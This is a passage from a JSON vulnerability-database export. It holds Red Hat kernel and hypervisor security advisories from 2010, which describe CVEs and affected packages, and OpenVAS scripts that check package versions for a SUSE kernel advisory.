RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\nsupport in the qla2xxx driver, resulting in two new sysfs pseudo files,\n\"/sys/class/scsi_host/[a qla2xxx host]/vport_create\" and \"vport_delete\".\nThese two files were world-writable by default, allowing a local user to\nchange SCSI host attributes. This flaw only affects systems using the\nqla2xxx driver and NPIV capable hardware. (CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The \"dbg_lvl\"\nand \"poll_mode_io\" files on the sysfs file system (\"/sys/\") had\nworld-writable permissions. This could allow local, unprivileged users to\nchange the behavior of the driver. (CVE-2009-3889, CVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci driver\nused for OHCI compliant IEEE 1394 controllers. A local, unprivileged user\nwith access to /dev/fw* files could issue certain IOCTL calls, causing a\ndenial of service or privilege escalation. The FireWire modules are\nblacklisted by default, and if enabled, only root has access to the files\nnoted above by default. (CVE-2009-4138, Moderate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in the\nHFS file system implementation. This could lead to a denial of service if a\nuser browsed a specially-crafted HFS file system, for example, by running\n\"ls\". (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from\nwww.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update/\nindex.html\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "reporter": "RedHat", "published": "2010-01-19T05:00:00", "type": "redhat", "title": "(RHSA-2010:0046) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-6304", "CVE-2009-2910", "CVE-2009-3080", "CVE-2009-3556", "CVE-2009-3889", "CVE-2009-3939", "CVE-2009-4020", "CVE-2009-4021", "CVE-2009-4138", "CVE-2009-4141", "CVE-2009-4272"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:08:34", "id": "RHSA-2010:0046", "href": "https://access.redhat.com/errata/RHSA-2010:0046", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:12", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.24.7-149.el5rt", "arch": "x86_64", "packageName": "kernel-rt-devel", "packageFilename": "kernel-rt-devel-2.6.24.7-149.el5rt.x86_64.rpm", "operator": "lt"}], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a deficiency was found in the fasync_helper() implementation. This could\nallow a local, unprivileged user to leverage a use-after-free of locked,\nasynchronous file descriptors to cause a denial of service or privilege\nescalation. (CVE-2009-4141, Important)\n\n* multiple flaws were found in the mmap and mremap implementations. A\nlocal, unprivileged user could use these flaws to cause a local denial of\nservice or escalate their privileges. (CVE-2010-0291, Important)\n\n* a missing boundary check was found in the do_move_pages() function in the\nmemory migration functionality. A local user could use this flaw to cause a\nlocal denial of service or an information leak. (CVE-2010-0415, Important)\n\n* a NULL pointer dereference flaw was found in the ip6_dst_lookup_tail()\nfunction. An attacker on the local network could trigger this flaw by\nsending IPv6 traffic to a target system, leading to a system crash (kernel\nOOPS) if dst->neighbour is NULL on the target system when receiving an IPv6\npacket. (CVE-2010-0437, Important)\n\n* a NULL pointer dereference flaw was found in the Fast Userspace Mutexes\n(futexes) implementation. The unlock code path did not check if the futex\nvalue associated with pi_state->owner had been modified. A local user could\nuse this flaw to modify the futex value, possibly leading to a denial of\nservice or privilege escalation when the pi_state->owner pointer is\ndereferenced. (CVE-2010-0622, Important)\n\n* an information leak was found in the print_fatal_signal() implementation.\nWhen \"/proc/sys/kernel/print-fatal-signals\" is set to 1 (the default value\nis 0), memory that is reachable by the kernel could be leaked to\nuser-space. This issue could also result in a system crash. Note that this\nflaw only affected the i386 architecture. (CVE-2010-0003, Moderate)\n\n* a flaw was found in the kernel connector implementation. A local,\nunprivileged user could trigger this flaw by sending an arbitrary amount of\nnotification requests using specially-crafted netlink messages, resulting\nin a denial of service. (CVE-2010-0410, Moderate)\n\n* missing capability checks were found in the ebtables implementation, used\nfor creating an Ethernet bridge firewall. This could allow a local,\nunprivileged user to bypass intended capability restrictions and modify\nebtables rules. (CVE-2010-0007, Low)\n\nThis update also fixes the following bugs:\n\n* references were missing for two LSI MegaRAID SAS controllers already\nsupported by the kernel, preventing systems using these controllers from\nbooting. (BZ#554664)\n\n* a typo in the fix for CVE-2009-2691 resulted in gdb being unable to read\ncore files created by gcore. (BZ#554965) \n\n* values for certain pointers used by the kernel, which should be\nundereferencable, could potentially be abused when a kernel OOPS occurs.\nValues that are harder to dereference are now used. (BZ#555227)\n\n* this update redesigns the locking scheme of the TTY process group\n(tty->pgrp) structure, due to race conditions introduced when tty->pgrp\nstarted using struct pid instead of pid_t. (BZ#559101)\n\n* the way the NFS kernel server used iget() and the way in which it kept\nits cache of inode information, could have led to (mainly on busy file\nservers) inconsistencies between the local file system and the file system\nbeing served to clients. (BZ#561275)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "reporter": "RedHat", "published": "2010-03-23T04:00:00", "type": "redhat", "title": "(RHSA-2010:0161) Important: kernel-rt security and bug fix update", "enchantments": {"score": {"modified": "2018-12-11T17:44:12", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2691", "CVE-2009-4141", "CVE-2009-4895", "CVE-2010-0003", "CVE-2010-0007", "CVE-2010-0291", "CVE-2010-0410", "CVE-2010-0415", "CVE-2010-0437", "CVE-2010-0622"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-25T06:34:58", "id": "RHSA-2010:0161", "href": "https://access.redhat.com/errata/RHSA-2010:0161", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:40:55", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.4-2.1.8.el5_4rhev2_1", "arch": "noarch", "packageName": "rhev-hypervisor-pxe", "packageFilename": "rhev-hypervisor-pxe-5.4-2.1.8.el5_4rhev2_1.noarch.rpm", "operator": "lt"}], "description": "The rhev-hypervisor package provides a Red Hat Enterprise Virtualization\n(RHEV) Hypervisor ISO disk image. The RHEV Hypervisor is a dedicated\nKernel-based Virtual Machine (KVM) hypervisor. It includes everything\nnecessary to run and manage virtual machines: A subset of the Red Hat\nEnterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: RHEV Hypervisor is only available for the Intel 64 and AMD64\narchitectures with virtualization extensions.\n\nA flaw was found in the IPv6 Extension Header (EH) handling\nimplementation in the Linux kernel. The skb->dst data structure was not\nproperly validated in the ipv6_hop_jumbo() function. This could possibly\nlead to a remote denial of service. (CVE-2007-4567)\n\nThe Parallels Virtuozzo Containers team reported two flaws in the routing\nimplementation. If an attacker was able to cause a large enough number of\ncollisions in the routing hash table (via specially-crafted packets) for\nthe emergency route flush to trigger, a deadlock could occur. Secondly, if\nthe kernel routing cache was disabled, an uninitialized pointer would be\nleft behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272)\n\nA flaw was found in each of the following Intel PRO/1000 Linux drivers in\nthe Linux kernel: e1000 and e1000e. A remote attacker using packets larger\nthan the MTU could bypass the existing fragment check, resulting in\npartial, invalid frames being passed to the network stack. These flaws\ncould also possibly be used to trigger a remote denial of service.\n(CVE-2009-4536, CVE-2009-4538)\n\nA flaw was found in the Realtek r8169 Ethernet driver in the Linux kernel.\nReceiving overly-long frames with a certain revision of the network cards\nsupported by this driver could possibly result in a remote denial of\nservice. (CVE-2009-4537)\n\nThe x86 emulator implementation was missing a check for the Current\nPrivilege Level (CPL) and I/O Privilege Level (IOPL). A user in a guest\ncould leverage these flaws to cause a denial of service (guest crash) or\npossibly escalate their privileges within that guest. (CVE-2010-0298,\nCVE-2010-0306)\n\nA flaw was found in the Programmable Interval Timer (PIT) emulation. Access\nto the internal data structure pit_state, which represents the data state\nof the emulated PIT, was not properly validated in the pit_ioport_read()\nfunction. A privileged guest user could use this flaw to crash the host.\n(CVE-2010-0309)\n\nThis updated package provides updated components that include fixes for\nsecurity issues; however, these issues have no security impact for RHEV\nHypervisor. These fixes are for kernel issues CVE-2006-6304, CVE-2009-2910,\nCVE-2009-3080, CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,\nCVE-2009-4021, CVE-2009-4138, and CVE-2009-4141; ntp issue CVE-2009-3563;\ndbus issue CVE-2009-1189; dnsmasq issues CVE-2009-2957 and CVE-2009-2958;\ngnutls issue CVE-2009-2730; krb5 issue CVE-2009-4212; bind issue \nCVE-2010-0097; gzip issue CVE-2010-0001; openssl issues CVE-2009-2409 and \nCVE-2009-4355; and gcc issue CVE-2009-3736.\n\nThis update also fixes the following bugs:\n\n* on systems with a large number of disk devices, USB storage devices may\nget enumerated after \"/dev/sdz\", for example, \"/dev/sdcd\". This was not\nhandled by the udev rules, resulting in a missing \"/dev/live\" symbolic\nlink, causing installations from USB media to fail. With this update, udev\nrules correctly handle USB storage devices on systems with a large number\nof disk devices, which resolves this issue. (BZ#555083)\n\nAs RHEV Hypervisor is based on KVM, the bug fixes from the KVM update\nRHSA-2010:0088 have been included in this update:\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0088.html\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues.", "reporter": "RedHat", "published": "2010-02-09T05:00:00", "type": "redhat", "title": "(RHSA-2010:0095) Important: rhev-hypervisor security and bug fix update", "enchantments": {"score": {"modified": "2018-12-11T17:40:55", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-6304", "CVE-2007-4567", "CVE-2009-1189", "CVE-2009-2409", "CVE-2009-2730", "CVE-2009-2910", "CVE-2009-2957", "CVE-2009-2958", "CVE-2009-3080", "CVE-2009-3556", "CVE-2009-3563", "CVE-2009-3736", "CVE-2009-3889", "CVE-2009-3939", "CVE-2009-4020", "CVE-2009-4021", "CVE-2009-4138", "CVE-2009-4141", "CVE-2009-4212", "CVE-2009-4272", "CVE-2009-4355", "CVE-2009-4536", "CVE-2009-4537", "CVE-2009-4538", "CVE-2010-0001", "CVE-2010-0097", "CVE-2010-0298", "CVE-2010-0306", "CVE-2010-0309"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-03T23:42:49", "id": "RHSA-2010:0095", "href": "https://access.redhat.com/errata/RHSA-2010:0095", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-12-14T11:49:01", "references": ["2010-010"], "pluginID": "850124", "description": "Check for the Version of kernel", "edition": 4, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-02-19T00:00:00", "title": "SuSE Update for kernel SUSE-SA:2010:010", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3939", "CVE-2010-0007", "CVE-2009-4141", "CVE-2009-4538", "CVE-2010-0299", "CVE-2009-4536", "CVE-2010-0003", "CVE-2010-0006"], "modified": "2017-12-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=850124", "id": "OPENVAS:850124", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for kernel SUSE-SA:2010:010\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This update of the openSUSE 11.2 kernel brings the kernel to version\n 2.6.31.12 and contains a lot of bug and security fixes.\n\n CVE-2010-0299: The permission of the devtmpfs root directory\n was incorrectly 1777 (instead of 755). If it was used, local\n attackers could escalate privileges.\n (openSUSE 11.2 does not use this filesystem by default).\n\n CVE-2009-3939: The poll_mode_io file for the megaraid_sas driver in\n the Linux kernel 2.6.31.6 and earlier has world-writable permissions,\n which allows local users to change the I/O mode of the driver by\n modifying this file.\n\n CVE-2010-0007: ebtables was lacking a CAP_NET_ADMIN check, making\n it possible for local unprivileged attackers to modify the network\n bridge management.\n\n CVE-2010-0003: An information leakage on fatal signals on x86_64\n machines was fixed.\n\n CVE-2009-4141: A race condition in fasync handling could be used by\n local attackers to crash the machine or potentially execute code.\n\n CVE-2010-0006: The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in\n the Linux kernel before 2.6.32.4, when network namespaces are enabled,\n allows remote attackers to cause a denial of service (NULL pointer\n dereference) via an invalid IPv6 jumbogram.\n\n CVE-2009-4536: drivers/net/e1000/e1000_main.c in the e1000 driver in\n the Linux kernel 2.6.32.3 and earlier handles Ethernet frames that\n exceed the MTU by processing certain trailing payload data as if it\n were a complete frame, which allows remote attackers to bypass packet\n filters via a large packet with a crafted payload.\n\n CVE-2009-4538: drivers/net/e1000e/netdev.c in the e1000e driver in\n the Linux kernel 2.6.32.3 and earlier does not properly check the\n size of an Ethernet frame that exceeds the MTU, which allows remote\n attackers to have an unspecified impact via crafted packets.\";\n\ntag_impact = \"remote denial of service\";\ntag_affected = \"kernel on openSUSE 11.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850124);\n script_version(\"$Revision: 8092 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-13 07:31:16 +0100 (Wed, 13 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-19 13:38:15 +0100 (Fri, 19 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-010\");\n script_cve_id(\"CVE-2009-3939\", \"CVE-2009-4141\", \"CVE-2009-4536\", \"CVE-2009-4538\", \"CVE-2010-0003\", \"CVE-2010-0006\", \"CVE-2010-0007\", \"CVE-2010-0299\");\n script_name(\"SuSE Update for kernel SUSE-SA:2010:010\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-default\", rpm:\"preload-kmp-default~1.1_2.6.31.12_0.1~6.9.12\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-desktop\", rpm:\"preload-kmp-desktop~1.1_2.6.31.12_0.1~6.9.12\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:54", "references": ["2010-010"], "pluginID": "1361412562310850124", "description": "Check for the Version of kernel", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-02-19T00:00:00", "title": "SuSE Update for kernel SUSE-SA:2010:010", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3939", "CVE-2010-0007", "CVE-2009-4141", "CVE-2009-4538", "CVE-2010-0299", "CVE-2009-4536", "CVE-2010-0003", "CVE-2010-0006"], "modified": "2017-12-26T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850124", "id": "OPENVAS:1361412562310850124", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for kernel SUSE-SA:2010:010\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This update of the openSUSE 11.2 kernel brings the kernel to version\n 2.6.31.12 and contains a lot of bug and security fixes.\n\n CVE-2010-0299: The permission of the devtmpfs root directory\n was incorrectly 1777 (instead of 755). If it was used, local\n attackers could escalate privileges.\n (openSUSE 11.2 does not use this filesystem by default).\n\n CVE-2009-3939: The poll_mode_io file for the megaraid_sas driver in\n the Linux kernel 2.6.31.6 and earlier has world-writable permissions,\n which allows local users to change the I/O mode of the driver by\n modifying this file.\n\n CVE-2010-0007: ebtables was lacking a CAP_NET_ADMIN check, making\n it possible for local unprivileged attackers to modify the network\n bridge management.\n\n CVE-2010-0003: An information leakage on fatal signals on x86_64\n machines was fixed.\n\n CVE-2009-4141: A race condition in fasync handling could be used by\n local attackers to crash the machine or potentially execute code.\n\n CVE-2010-0006: The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in\n the Linux kernel before 2.6.32.4, when network namespaces are enabled,\n allows remote attackers to cause a denial of service (NULL pointer\n dereference) via an invalid IPv6 jumbogram.\n\n CVE-2009-4536: drivers/net/e1000/e1000_main.c in the e1000 driver in\n the Linux kernel 2.6.32.3 and earlier handles Ethernet frames that\n exceed the MTU by processing certain trailing payload data as if it\n were a complete frame, which allows remote attackers to bypass packet\n filters via a large packet with a crafted payload.\n\n CVE-2009-4538: drivers/net/e1000e/netdev.c in the e1000e driver in\n the Linux kernel 2.6.32.3 and earlier does not properly check the\n size of an Ethernet frame that exceeds the MTU, which allows remote\n attackers to have an unspecified impact via crafted packets.\";\n\ntag_impact = \"remote denial of service\";\ntag_affected = \"kernel on openSUSE 11.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850124\");\n script_version(\"$Revision: 8246 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 08:29:20 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-19 13:38:15 +0100 (Fri, 19 Feb 2010)\");\n 